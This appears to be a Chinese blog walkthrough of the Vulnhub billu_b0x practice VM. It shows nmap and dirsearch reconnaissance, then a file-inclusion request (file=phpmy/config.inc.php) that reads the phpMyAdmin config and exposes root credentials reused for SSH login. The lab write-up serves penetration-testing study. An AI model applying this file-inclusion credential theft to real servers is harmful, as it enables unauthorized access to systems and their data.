Vulnhub-billu-b0x靶机 新思路

主机发现阶段

使用nmap 扫描C段地址来发现主机

nmap -sn IP/24

在这里插入图片描述

信息收集/渗透测试阶段

通过Goby扫描常见开放端口资产信息
在这里插入图片描述
开放端口情况(常见端口):

端口号相对应服务
22SSH服务
80WEB服务

使用dirsearch扫描目录路径

[16:19:18] Starting:

[16:19:20] 403 -  293B  - /.ht_wsr.txt

[16:19:20] 403 -  296B  - /.htaccess.bak1

[16:19:20] 403 -  296B  - /.htaccess.orig

[16:19:20] 403 -  298B  - /.htaccess.sample

[16:19:20] 403 -  296B  - /.htaccess.save

[16:19:20] 403 -  297B  - /.htaccess_extra

[16:19:20] 403 -  296B  - /.htaccess_orig

[16:19:20] 403 -  294B  - /.htaccess_sc

[16:19:20] 403 -  294B  - /.htaccessBAK

[16:19:20] 403 -  294B  - /.htaccessOLD

[16:19:20] 403 -  295B  - /.htaccessOLD2

[16:19:20] 403 -  286B  - /.htm

[16:19:20] 403 -  293B  - /.httr-oauth

[16:19:28] 200 -  307B  - /add

[16:19:28] 200 -  307B  - /add.php

[16:19:39] 200 -    1B  - /c

[16:19:39] 403 -  290B  - /cgi-bin/

[16:19:44] 403 -  286B  - /doc/

[16:19:44] 403 -  290B  - /doc/api/

[16:19:44] 403 -  301B  - /doc/en/changes.html

[16:19:44] 403 -  301B  - /doc/html/index.html

[16:19:44] 403 -  300B  - /doc/stable.version

[16:19:49] 200 -    3KB - /head.php

[16:19:50] 301 -  317B  - /images  ->  http://192.168.56.203/images/

[16:19:50] 200 -    1KB - /images/

[16:19:50] 200 -   47KB - /in

[16:19:50] 200 -    3KB - /index

[16:19:50] 200 -    3KB - /index.php

[16:20:00] 302 -    2KB - /panel  ->  index.php

[16:20:00] 302 -    2KB - /panel.php  ->  index.php

[16:20:02] 200 -    8KB - /phpmy/

[16:20:08] 403 -  295B  - /server-status

[16:20:08] 403 -  296B  - /server-status/

[16:20:09] 200 -    1B  - /show

[16:20:14] 200 -   72B  - /test

[16:20:14] 200 -   72B  - /test.php

/phpmy/ phpmyadmin登录页面

/test.php file参数 疑似存在文件包含漏洞

phpmyadmin配置文件获取权限

访问 test.php 页面通过hackbar 插件post请求file参数

发现可以包含任意文件。
在这里插入图片描述
刚才目录扫描获取到了phpmyadmin路径:/phpmy/

可以直接包含路径下的phpmyadmin配置文件

file=phpmy/config.inc.php

在配置文件中找到 SSH账户密码:root:roottoor

$i++;
$cfg['Servers'][$i]['verbose'] = 'localhost';
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['port'] = '';
$cfg['Servers'][$i]['socket'] = '';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'roottoor';
$cfg['Servers'][$i]['AllowNoPassword'] = true;

在这里插入图片描述
使用mobaxteam连接,直接root登录,密码就是phpmyadmin配置文件中的
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值